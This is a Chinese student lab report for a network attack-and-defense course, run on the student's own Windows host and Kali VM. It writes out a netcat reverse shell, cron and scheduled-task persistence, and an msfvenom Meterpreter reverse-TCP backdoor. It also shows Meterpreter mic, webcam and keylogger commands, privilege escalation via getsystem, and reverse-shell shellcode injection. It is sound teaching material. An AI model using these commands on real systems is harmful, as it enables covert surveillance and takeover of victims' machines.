20212317 2023-2024-2 《网络与系统攻防技术》实验二实验报告

20212317王柯心 2024-04-03 13:28:16

一、实验内容

1.使用netcat获取主机操作Shell,cron启动某项任务
PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程
2.使用socat获取主机操作Shell, 任务计划启动
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

回答问题

1.例举你能想到的一个后门进入到你系统中的可能方式?
恶意链接或者带后门的插件,也可能是攻击者获取了主机的远程控制权限,利用实验内容3的方式传输后门文件。

2.例举你知道的后门如何启动起来(win及linux)的方式?
在Windows系统中,后门可能会注册为系统服务、添加到启动项或隐藏在系统进程中。
在Linux系统中,后门可能会通过修改启动脚本、添加定时任务或替换系统核心文件等方式启动。

3.Meterpreter有哪些给你映像深刻的功能?
远程命令执行、键盘记录以及通过反向连接建立持久性访问,并且可以绕过防火墙和入侵检测系统。

4.如何发现自己有系统有没有被安装后门?
定期检查系统日志以寻找异常活动记录、使用安全工具进行系统扫描以检测恶意软件或病毒、监控网络流量以发现异常连接、定期更新和审查系统的安全补丁、使用入侵检测系统来监测潜在的入侵行为等。

本周学习内容总结

后门概念:后门就是不经过正常认证流程而访问系统的通道。
后门原理:在计算机系统或软件中,通过一些特殊的设计或代码注入,使得攻击者可以绕过正常的安全机制,获取非法的权限或者执行恶意操作。

Ncat
• 作用:
探测端口是否开放、局域网聊天、文件传输、正向连接、反向连接(-e重定向马上连接)
• 常见用法:
端口扫描:通过ncat可以扫描目标主机上的开放端口,以便进行安全评估和漏洞检测。
网络调试:ncat可以用于测试网络服务的可用性和响应时间,以及检查网络连接是否正常。
数据传输:通过ncat可以在不同主机之间传输数据,可以用于文件传输、远程命令执行等场景。

Socat
• 作用:
socat是一种功能强大的网络工具,它可以在不同的网络连接之间建立双向通信。
• 常见用法:
端口转发:可以将一个端口上的数据转发到另一个端口,实现网络服务的代理或者端口映射。
文件传输:可以通过socat在两台计算机之间传输文件,类似于scp或者rsync。
串口通信:可以通过socat将串口设备连接到网络上,实现串口通信的远程控制。
加密和解密:socat支持SSL和TLS协议,可以在网络连接中进行加密和解密操作。

MSF meterpreter
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道(shell)。

二、实验过程

1.使用netcat获取主机操作Shell,cron启动某项任务

• 关闭Windows主机的防火墙

img

• 在主机使用ipconfig命令查看主机ip为172.16.215.160
这里要注意,重新连接网络时主机IP可能会改变,因此每次实验前都要查看IP

img

• 在主机终端输入并运行指令:ncat -l -p 2317
• 在虚拟机终端输入并运行指令:nc 172.16.215.160 2317 -e /bin/sh
可以看到在主机上可以调用linux的shell查看虚拟机的目录

img

2.使用socat获取主机操作Shell, 任务计划启动

• Windows主机进入root模式:su root
• 输入:echo “* * * * * * echo “20212317” > /root/Desktop/20212317.txt” >/var/spool/cron/crontabs/root
让Linux虚拟机中的20212317.txt文件中每秒输入字符串“20212317”

img

• 编写一段C语言代码,使该代码运行后会在桌面生成一个文件,并在文件中写入“20212317”
• 对20212317.c文件进行编译,生成20212317.exe可执行文件
gcc 20212317.c -o 20212317.exe
(这里因为第一次2012317wkx.txt的文件编译错误因此又重新写了一个20212317.c的文件,下图仅展示文件代码)

img

• 通过socat将linux虚拟机连接windows主机,输入命令:schtasks /create /sc minute /mo 1 /tn “20212317wkx” /tr C:\Users\31501\Desktop\20212317.exe
让主机每隔一分钟执行一次.exe文件

img

• 查看任务计划程序库,验证程序运行情况:

img

• 查看桌面文件情况:

img

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

• 输入ip a,查询linux虚拟机ip为192.168.174.128

img

• 输入命令:msfvenom -p windows/meterpreter/reverse tcp LHOST=192.168.174.128 LPORT=2317 -f exe >20212317backdoor生成后门文件20212317backdoor

img

• windows主机输入:ncat -lvp 2317>20212317wkxdoor.exe
• linux虚拟机输入:nc 172.30.3.111 231720212317wkxdoor
• 将后门文件从linux虚拟机传到windows主机

img

• 打开桌面上的ncat文件夹,查看文件是否成功传输:

img

• 在linux虚拟机中依次输入以下指令:
• msfconsole

img

• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set LHOST 192.168.174.128(截图中输入的是主机ip,后门更正成了虚拟机ip但是忘截图了)
• set LPORT 2017
• show options

img

以上截图因为用错了ip所以没有监听到内容,后续将ip修改成虚拟机ip继续进行监听
• Windows主机进入ncat文件夹并输入:2021217backdoor.exe
• linux虚拟机输入exploit对主机的程序运行情况进行监听

img

4.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(1)获取目标主机音频
终端输入record_mic -d 10(对主机进行十秒的录音)

img

(2)获取主机摄像头权限
终端输入webcam_snap(获取主机摄像头)

img

(3)获取主机击键记录
终端输入
• keyscan_start //开始获取主机击键记录
• keyscan_dump //读取主机击键记录
• keyscan_stop //停止

img

(4)尝试提权
终端输入
• use exploit/windows/local/ask
• set FILENAME 20212317.exe //设置其中显示的应用程序的名字
• set SESSION 1

img

• set PATH D:\test
• set LHOST 192.168.174.128
• set LPORT 2317
• run
• getsystem //尝试提权

img

提权成功!(这里发现没法截图,忘记可以拍照了)

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

(1)根据实验一找到返回地址为0xffffd010

img

(2)使用MSF生成shellcode

img

(3)注入到20212317pwn1中

img

(4)获取反弹连接Shell
• msfconsole开启mfs
• use exploit/multi/handler 侦听模块
• set payl
• oad linux/x86/shell_reverse_tcp
• set LHOST 192.168.174.128kali的ip地址
• set LPORT 2317
• show options 查看配置
• exploit 执行
• ls

img

三、问题及解决方案

问题1:.exe文件无法运行

img

问题1解决方案:原因是在我写好代码后直接把后缀改成了.exe导致程序无法运行,后续我对.c文件进行了编译,得到了20212317.exe可执行程序

问题2:linux虚拟机监听不到Windows主机运行后门文件时的状态。

img

问题2解决方案:ip地址填错了,应该用虚拟机的ip而不是主机ip。

问题3:主机无法运行后门文件

img

问题3解决方案:关闭主机防火墙以及各种杀毒软件,避免后门运行时被拦截。

四、学习感悟、思考

通过本次实验我简单了解了ncat、socat以及MSF meterpreter的使用。本次实验内容还是比较多的,对于我来说难度不小,在做实验的过程中也查阅了很多资料才把这个实验完成。本次实验我是在几个不同的时间完成的,因此会出现ip地址变化以及防火墙状态不同等问题,这也导致我在做实验的过程中经常出现监听被拦截的情况,在以后的实验中我还是尽可能一口气做完及时截图,减少这类问题的发生。

...全文
27 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
网络信息安全综合实验 任 务 书 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 、 主要内容 实验一加密认证通信系统实现 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 实验 综合扫描及安全评估 利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出 全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从 而提高系统的安全性能。 实验网络攻防技术 矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够 的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地 解决各种威胁。 实验四 Windows系统安全配置方案 作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往 忽视了OS的安全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方 面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此 ,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵 检测软件来加强系统的安全。 其中实验一要求编程实现,可直接调用相关功能函数完成。实验实验四可在机房 的网络信息安全综合实验系统上完成。 三、 进度计划 "序号 "设计(实验)内容 "完成时间 "备注 " "1 "接受任务,查阅文献,开始实 "第一天 " " " "现密码算法和认证算法 " " " "2 "完成加密认证通信系统 "第至七天 " " "3 "上午完成综合扫描及安全评估 "第八天 " " " "实验,下午进行网络攻防实验 " " " "4 "上午完成网络攻防实验,下午 "第九天 " " " "进行系统安全配置实验 " " " "5 "撰写实验报告并验收 "第十天 " " 四、 实验成果要求 1. 要求程序能正常运行,并实现任务书要求功能。 2. 完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重 对设计思路的归纳和对问题解决过程的总结。 五、 考核方式 平时成绩+程序验收+实验报告。 学生姓名: 指导教师: 2016 年 6 月 13 日 实验报告 题 目: 网络信息安全综合实验 院 系:计算机系 班 级: 学 号: 学生姓名: 指导教师: 成 绩: 实验日期:2021 年 6 月 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 实验内容 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 三、实验结果 实验一:本通信系统为用C#语言编写的P2P方式通信的系统,其具体功能如下: 1、识别本机IP地址并赋值到文本框中,产生一个随机数作为端口号,端口号范围限制在 1000到65535之间。 2、通过运用网络编程的知识尝试用产生的IP与端口号进行监听。 图1 发送方界面 图2 接收方界面 3、设置刷新区域,定时刷新好友在线,可以设置刷新间隔,启动和停止刷新。这里 可以通过拖拽VS里自带的控件"timersecond",实现计时。 4、发送消息。消息的传送是具有加密与认证的。 加密:考虑到DES的安全性问题,加密消息是采用AES方式加密的,本系统采用的是 C#封装好的AES程序,调用接口,实现对明文的加密。解密同理。 认证:认证是将明文哈希散列后采用RSA算法对其进行签名,再用公钥加密进行认证 的,其中哈希散列采用的是SHA1方式。下图为加密与认证的具体流程。 图3 加密与认证流程 图4 发送方可显示明文与密文 图5接收方解密出明文 5、可以发送文件。通过获取文本框中的文件地址,建立文件流,向接收端发送文件 。 接收端进行文件监听,接收文件,与发送文件编写过程相似,只是把"写"换成了"读"文 件。VS里自带的控件"saveFileDialog"可以帮助用户提示选择保存文件的位置。 图6 输入文件位置 图7 询问是否接受文件 图8 接收与发送文件成功 实验:认识性实验实验为认识练习信息安全实验平台的部分实验。 SuperScan端口扫描实验 扫描结果如下图: 图
网络安全实验 石河子大学信息科学与技术学院 网络安全课程实验 "实验名称: "使用任选工具进行网络检测与扫描 " "学生姓名: "刘金红 " " "学 号: "05 " " "学 院: "信息科学与技术学院 " "专业年级: "计算机科学与技术专业2012级 " "指导教师: "曹传东老师 " "完成日期: " " 目录 1 实验环境 3 2 实验目的 3 3 实验步骤 3 4 实验内容 4 DOS窗口中常用网络命令的操作使用及IPCS攻击实践 4 DOS窗口中ping 命令及其常见带参数子命令的用法实践 4 DOS窗口中IPconfig 命令及其常见带参数子命令的用法实践 6 DOS窗口中nslookup命令及其常见带参数子命令的用法实践 8 DOS窗口中netstat命令及其常见带参数子命令的用法实践 10 DOS窗口中arp命令及其常见带参数子命令的用法实践 12 DOS窗口中route命令及其常见带参数子命令的用法实践 13 DOS窗口中tracert命令及其常见带参数子命令的用法实践 14 DOS窗口中ftp命令及其常见带参数子命令的用法实践 15 DOS窗口中telnet命令及其常见带参数子命令的用法实践 16 DOS窗口中sc命令及其常见带参数子命令的用法实践 20 DOS窗口中nbtstat命令及其常见带参数子命令的用法实践 22 DOS窗口中net命令及其常见带参数子命令的用法实践 24 DOS窗口中at命令及其常见带参数子命令的用法实践 25 使用课本第四章各案例中介绍的工具软件进行网络信息收集和扫描检测 25 在虚拟机系统Window200x中使用GetNTuser工具扫描本机系统上存在的用户名, 并猜解其中具有空密码和弱口令的用户;在该软件中使用自定义字典文件穷举猜 解某个用户的口令(爆破); 25 使用Port Scan 工具软件进行对某目标机开放端口的扫描; 28 在虚拟机系统中使用Shed 工具软件扫描某个目标主机的共享目录信息; 31 编译执行课本中案例4-4介绍的代码,并利用抓包工具进行验证; 32 使用漏洞扫描工具X-Scan对指定IP 地址段或单机进行全面的安全漏洞扫描和检测; 36 使用嗅探工具Win Sniffer 监听客户端登陆FTP服务器的用户和密码信息; 39 使用自选的任一款扫描工具进行网络攻击前的信息收集 42 使用CIS工具对本机系统进行安全风险评估 42 使用Superscan扫描工具实现秘密端口扫描 44 实验一:使用任选工具软件进行网络检测和扫描 1 实验环境 1台带有活动网络连接(插有网卡且工作正常)、安装有VMware虚拟机软件的PC机,其中 主机环境配置如表1-1所示: 表1-1 本机环境:主机操作系统的配置(作为客户机端) "操作系统 "Windows系列操作系统,版本均可,推荐Win7/Windows XP " "Telnet客户端 "F-Term(版本不限)或 " "工具 " " "FTP客户端工具"Cute FTP pro/Flash FXP (版本不限)或 " "Web浏览器 "IE/Mozilla FireFox(版本不限)或其他浏览器软件 " "抓包软件 "Sniffer Pro 支持千兆网卡) " "屏幕截图工具 "HyperSnap-DX (可抓滚屏的单文件版本) " "IP地址 " (机房做的) (后来改了) " 虚拟机配置如下表1-2所示: 表1-2 虚拟机环境:虚拟机操作系统的配置(作为服务器端) "操作系统 "Windows 200X Advance " " "Server,且安装配置了WWW/FTP/DNS/Telnet等网络服务 " "IP地址 " " 2 实验目的 1. 通过该实验,掌握在DOS命令窗口中常用网络命令的使用方法; 2. 通过该实验,掌握利用教程第四章介绍的各个案例中的工具软件进行网络检测扫描的 基本方法; 3. 通过该实验,掌握使用自选的一款工具软件进行网络攻击前的信息收集的基本方法; 4. 进一步加深对TCP/IP协议的理解和认识; 3 实验步骤 1. 实验前先阅读材料相关章节以及实验一参考资料(PPT及命令简介文档、实验指导书) ,充分预习,了解实验步骤并准备相关的工具软件; 2. 每个人在自己的本机系统上安装各种工具软件,以自己的虚拟机系统作为扫描目标; 3. 在各工具软件中分别进行参数设置,以实现客户机端获取靶机服务器的各种信息; 4. 在虚拟机系统中启动Sniffer Pro 或Wireshark,进行数据包捕获模式,抓取攻防双方的各种通信协议数据包,查看数 据包中的各种敏感扫描信息的报文内容; 5. 独立完成本次实验报告; 6. 实验完成后,思考以下问题,如何防范对方从网络上获得自己机器的各种信息 4
xxxxxxx 学生实习(实训)总结报告 学 院:xxxxxxxxxxxxxxxxxx 专业班级:_xxxxxxxxxx_ 学生姓名:____xxxxxxxxx_____ 学 号:xxxxxxxxxx_ 实习(实训)地点:___xxxxx____ ____________ __ 报告题目:__xxxxxxxxxxxxxxxxxxxx__________ ____ 报告日期: xxx 年 xxx月 xxx日 指导教师评语: ____________ _______________________ ______________________________________________________________________ ______________________________________________________________________ ___________________ 成绩(五级记分制):______ _______ 指导教师(签字):_____________________ xxxxx 实习(实训)任务书 设计题目:数据恢复技术应用 "学生姓名 "xxxxx " "课程名称 "xxxxx "专业班级 "xxxxx " "地 点 "xxxxx "起止时间 "xxxxx " "设 "数据恢复是在系统数据丢失或其他诸多原因而导致的灾难后,快速进" "计 "行数据恢复,以保障系统正常运行的常用手段。通过该综合训练,使" "内 "学生了解数据恢复的重要性,并认识到电磁泄漏现象引起的数据恢复" "容 ",硬件损坏、文件的删除等实现数据恢复的内容。 " "及 "要求:理解数据备份的重要性,以及磁盘数据恢复的原理,认识数据" "要 "恢复技术对信息安全的影响。能够使用数据恢复软件EasyRecovery进" "求 "行文件恢复。 " " "提高要求:能够对磁盘数据进行彻底清除。 " "设 "掌握EasyRecovery的应用; " "计 "理解磁盘分区的原理及特征; " "参 "设计利用EasyRecovery或手动方法进行数据恢复的解决方案。 " "数 " " "进 "12月19-20日:了解设计任务、掌握磁盘分区特征、熟悉工具软件;" "度 "12月21-28日:数据恢复的实施; " "要 "12月29-30日:撰写综合训练总结报告,作品检查、提交、答辩。 " "求 " " "参 "[1] 吴灏.《网络攻防技术》[M].北京:机械工业出版社,2009. " "考 "[2]胡建伟.《网络安全与保密》[M]. 西安电子科技大学出版社,2006." "资 "[3]牛少彰,江为强.《网络的攻击于防范——理论与实践》[M]. 北京: " "料 "北京邮电大学出版社,2006. " " "[4] 蒋朝惠. 《信息安全综合实验》[M]. " " "北京:中国铁道出版社,2010. " " "[5] 蒋朝惠. 《信息安全原理与技术》[M]. " " "北京:中国铁道出版社,2009. " "其 " " "它 " " "说 " " "明 "1.本表应在每次实施前一周由负责教师填写份,院系审批后交院 " " "系办备案,一份由负责教师留用。2.若填写内容较多可另纸附后。3" " ".一题多名学生共用的,在设计内容、参数、要求等方面应有所区别 " " "。 " 系主任: 指导教师:xxxxx 年 月 日 前言 随着计算机技术的发展,同时硬盘由于其容量大价格便宜也成为人们存储数据的主要 设备。然而由于种种原因,硬盘的数据可能会被损坏,这也给个人和社会带来很大的损 失。因此,数据损坏后的数据恢复显得非常重要。虽然在数据恢复领域有很多的厂商已 经有比较成熟的技术。然而对于并不了解硬盘原理普通人来说,如果试图恢复数据,但 又无法采用很好的方法,选择正确的工具,就很难很好的恢复数据。然而不管用什么方 法进行数据恢复,都不能保证100%的能成功,所以在使用电脑时,我们应该注意数据备 份工作。 本文分析了硬盘的有关内部结构与文件存储系统以及硬盘数据损坏的有关原因,然后 介绍如何使用数据恢复软件EasyRecovery进行文件恢复。 目录 前言 I 1 设计内容及要求 1 实训内容 1 实训要求 1 2 数据恢复原理 2 3 数据恢复常见实例 4 主引导区的恢复 4 分区表破坏修复 5 DBR修复 5 文件删除后的修复 6 因病毒侵害而导致的文件丢失 6 利用EasyRecovery恢复丢失文件 7 4 总结 14 致谢 15 参考文献 16 1 设计内容及要求 硬盘数据丢失对于硬盘来说,仅仅就是硬盘上的某些地方的磁性消失。硬盘数据的丢 失的原因本来就有很多种,可能因为人的误操作而丢失,也可能是因为病毒的入侵而破 坏数据。并且

69

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧